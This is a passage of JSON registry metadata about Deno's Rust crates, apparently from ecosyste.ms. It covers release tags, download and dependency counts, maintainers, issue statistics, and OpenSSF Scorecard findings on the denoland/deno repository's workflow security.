no/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-01T17:39:26.094Z","dependent_packages_count":22,"downloads":1497472,"downloads_period":"total","dependent_repos_count":191,"rankings":{"downloads":3.917281943158566,"dependent_repos_count":2.8252412075941487,"dependent_packages_count":1.8954283979543387,"stargazers_count":0.002334030949250387,"forks_count":0.05912878404767647,"docker_downloads_count":3.08896531333157,"average":1.9647299461725918},"purl":"pkg:cargo/deno_url","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_url","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_url","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_url/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-01T13:55:36.167Z","issues_count":6642,"pull_requests_count":9658,"avg_time_to_close_issue":17154660.07956933,"avg_time_to_close_pull_request":1531229.652833002,"issues_closed_count":3806,"pull_requests_closed_count":8047,"pull_request_authors_count":584,"issue_authors_count":2483,"avg_comments_per_issue":2.5031616982836495,"avg_comments_per_pull_request":0.7206460965003106,"merged_pull_requests_count":7026,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":674,"past_year_pull_requests_count":1199,"past_year_avg_time_to_close_issue":1405483.9744680852,"past_year_avg_time_to_close_pull_request":1297781.037313433,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":670,"past_year_pull_request_authors_count":187,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2210682492581602,"past_year_avg_comments_per_pull_request":1.1226021684737282,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":4,"past_year_merged_pull_requests_count":501,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":399,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_url/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:36.252Z","updated_at":"2022-11-07T18:29:36.252Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.937Z","updated_at":"2023-07-18T22:41:28.937Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047827,"name":"deno_websocket","ecosystem":"cargo","description":"Implementation of WebSocket API for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":268,"first_release_published_at":"2021-01-06T16:08:36.635Z","latest_release_published_at":"2026-08-06T11:45:58.701Z","latest_release_number":"0.262.0","last_synced_at":"2026-08-29T21:56:49.639Z","created_at":"2022-04-12T10:02:41.278Z","updated_at":"2026-08-29T21:56:49.640Z","registry_url":"https://crates.io/crates/deno_websocket/","install_command":"cargo install deno_websocket","documentation_url":"https://docs.rs/deno_websocket/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the 